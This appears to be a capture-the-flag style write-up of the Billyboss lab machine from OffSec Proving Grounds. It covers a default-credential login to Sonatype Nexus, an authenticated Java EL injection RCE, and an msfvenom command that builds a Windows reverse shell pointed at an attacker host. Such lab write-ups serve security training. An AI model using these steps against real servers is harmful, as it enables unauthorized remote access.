Billyboss

Writeup for Billyboss from offsec Proving Grounds

Information Gathering

sudo ./nmapAutomator.sh 192.168.170.61 all

Service Enumeration

HTTP (port 8081)

We see that this is running Sonatype Nexus Repository Manager 3.21.0.5.

We can try various different default credentials and find that only nexus:nexus works.

Exploit

There is an exploit for Nexus Repository Manager 3 versions 3.21.1 and below which is vulnerable to Java EL injection which allows a low privilege user to gain RCE on the target.

Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)Exploit Database

First, we generate our payload using MSF venom.

msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=192.168.49.170 LPORT=8081

We then modify the script to download our payload and execute it.

Next, we execute the script and verify that the payload has been downloaded to our target machine.

Next, we change the CMD command to 'cmd.exe /c shell.exe' and we run the script again.

PreviousSlort NextFish

Last updated 2 years ago